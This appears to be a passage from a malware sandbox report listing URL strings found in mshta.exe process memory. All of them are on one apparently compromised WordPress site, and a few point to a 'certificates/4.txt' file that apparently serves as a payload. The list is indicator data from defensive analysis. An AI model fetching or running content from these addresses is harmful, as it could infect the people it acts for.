Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387227978.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537862942.0000000003554000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.541711426.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.544730764.00000000070A0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542517709.0000000006B39000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3
Source: mshta.exe, 0000000A.00000002.542517709.0000000006B39000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.36
Source: mshta.exe, 0000000A.00000002.544730764.00000000070A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3erC:
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3j7
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386677165.0000000003585000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.538240401.0000000003588000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/style.css
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542148707.0000000006B07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.png
Source: mshta.exe, 0000000A.00000002.542148707.0000000006B07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.pngn
Source: mshta.exe, 0000000A.00000002.542148707.0000000006B07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.pngu
Source: mshta.exe, 0000000A.00000003.387366478.000000000CCBD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.556493364.000000000CCBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.pngugin.js?ver=1.2.8.1s?v
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386639993.000000000CD3B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386551302.000000000CD31000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387227978.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387366478.000000000CCBD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386488905.000000000CCEE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386677165.0000000003585000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386140675.0000000006B47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.556680708.000000000CCF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.538240401.0000000003588000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4
Source: mshta.exe, 0000000A.00000003.386488905.000000000CCEE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.556680708.000000000CCF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.49p
Source: mshta.exe, 0000000A.00000003.387366478.000000000CCBD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.556493364.000000000CCBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4?ver=2.1.0
Source: mshta.exe, 0000000A.00000003.403877946.0000000007655000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.548453703.0000000007655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0e
Source: mshta.exe, 0000000A.00000002.542301085.0000000006B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0er=2.6.0y
Source: mshta.exe, 0000000A.00000002.541711426.0000000006AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0r=1.0
Source: mshta.exe, 0000000A.00000002.541711426.0000000006AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0r=1.0n
Source: mshta.exe, 0000000A.00000003.386488905.000000000CCEE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.556680708.000000000CCF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0s
Source: mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/style.css
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/style.css.9.20b
Source: mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/style.css6
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/style.cssK
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/style.cssX
Source: mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/style.csse
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/style.cssy
Source: mshta.exe, 0000000A.00000003.403877946.0000000007655000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.548453703.0000000007655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework2
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386088242.000000000714D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.544798464.00000000070BA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.385933121.00000000070A9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.545468854.000000000714D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332768718.000000000353C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387227978.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537862942.0000000003554000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537609183.000000000353C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542301085.0000000006B1C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387290673.000000000353C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332104542.0000000006B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/bootstrap.css
Source: mshta.exe, 0000000A.00000002.537862942.0000000003554000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332104542.0000000006B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/responsive.css
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/responsive.css)
Source: mshta.exe, 0000000A.00000003.332104542.0000000006B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/responsive.cssnC:
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/responsive.cssq
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387227978.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537862942.0000000003554000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/favicon.ico
Source: mshta.exe, 0000000A.00000003.386677165.0000000003585000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.538240401.0000000003588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg
Source: mshta.exe, 0000000A.00000003.386677165.0000000003585000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.538240401.0000000003588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg%
Source: mshta.exe, 0000000A.00000002.545850187.0000000007190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg)
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.544798464.00000000070BA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387366478.000000000CCBD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.556493364.000000000CCBD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.385933121.00000000070A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg);
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg.0=1.0
Source: mshta.exe, 0000000A.00000003.386677165.0000000003585000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.538240401.0000000003588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpgU
Source: mshta.exe, 0000000A.00000003.386677165.0000000003585000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.538240401.0000000003588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpgY
Source: mshta.exe, 0000000A.00000003.386677165.0000000003585000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.538240401.0000000003588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpgd
Source: mshta.exe, 0000000A.00000002.542148707.0000000006B07000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0
Source: mshta.exe, 0000000A.00000002.542148707.0000000006B07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0%
Source: mshta.exe, 0000000A.00000002.556493364.000000000CCBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0.js?ver=5.0.33.0.6
Source: mshta.exe, 0000000A.00000002.542148707.0000000006B07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0G
Source: mshta.exe, 0000000A.00000002.542148707.0000000006B07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0R
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387227978.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386677165.0000000003585000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386140675.0000000006B47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542301085.0000000006B1C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.545850187.0000000007190000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.538240401.0000000003588000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0
Source: mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0)
Source: mshta.exe, 0000000A.00000002.545850187.0000000007190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0DT
Source: mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0g
Source: mshta.exe, 0000000A.00000002.542301085.0000000006B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0udes/certificates/4
Source: mshta.exe, 0000000A.00000002.541711426.0000000006AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0ver=5.0.3
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0ver=5.0.33.0.68S
Source: mshta.exe, 0000000A.00000002.541711426.0000000006AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0ver=5.0.3h
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387227978.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387366478.000000000CCBD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386677165.0000000003585000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386140675.0000000006B47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.545850187.0000000007190000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.538240401.0000000003588000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0
Source: mshta.exe, 0000000A.00000002.541711426.0000000006AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.00
Source: mshta.exe, 0000000A.00000003.387366478.000000000CCBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.00.0T
Source: mshta.exe, 0000000A.00000003.386677165.0000000003585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.01LMEM
Source: mshta.exe, 0000000A.00000002.545850187.0000000007190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0JVG
Source: mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0M
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0dows
Source: mshta.exe, 0000000A.00000003.386488905.000000000CCEE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.556680708.000000000CCF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0h
Source: mshta.exe, 0000000A.00000003.403877946.0000000007655000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.548453703.0000000007655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0http://facextrade.
Source: mshta.exe, 0000000A.00000002.556680708.000000000CCF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0s
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387227978.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537862942.0000000003554000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.541711426.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/main-style.css
Source: mshta.exe, 0000000A.00000002.541711426.0000000006AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/main-style.cssC:
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386677165.0000000003585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/main-style.cssF
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/main-style.cssK
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/main-style.cssS
Source: mshta.exe, 0000000A.00000002.541711426.0000000006AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/main-style.cssets/css/logo-slider-wp-public.cs
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/main-style.cssw
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332768718.000000000353C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387227978.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537862942.0000000003554000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332104542.0000000006B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/style.css
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332104542.0000000006B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/style.css3
Source: mshta.exe, 0000000A.00000003.332658393.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387469878.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.536752026.00000000034E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/style.cssdz
Source: mshta.exe, 0000000A.00000002.550469838.0000000008070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253NatKp$X
Source: mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themesy
Source: mshta.exe, 0000000A.00000003.332658393.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542517709.0000000006B39000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.png
Source: mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.png.3v
Source: mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.png0
Source: mshta.exe, 0000000A.00000002.542301085.0000000006B1C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.pngjs
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.pngn.js
Source: mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.pngsY
Source: mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/uploads/2018/08/fah
Source: mshta.exe, 0000000A.00000003.332911696.00000000070C3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.544849702.00000000070C2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.385933121.00000000070A9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387051343.00000000070C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/CherryFramework/style.css
Source: mshta.exe, 0000000A.00000003.332044641.0000000006B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt
Source: mshta.exe, 0000000A.00000002.556680708.000000000CCF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542148707.0000000006B07000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332104542.0000000006B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt#
Source: mshta.exe, 0000000A.00000002.556680708.000000000CCF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt#2
Source: mshta.exe, 0000000A.00000002.556680708.000000000CCF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt#bz
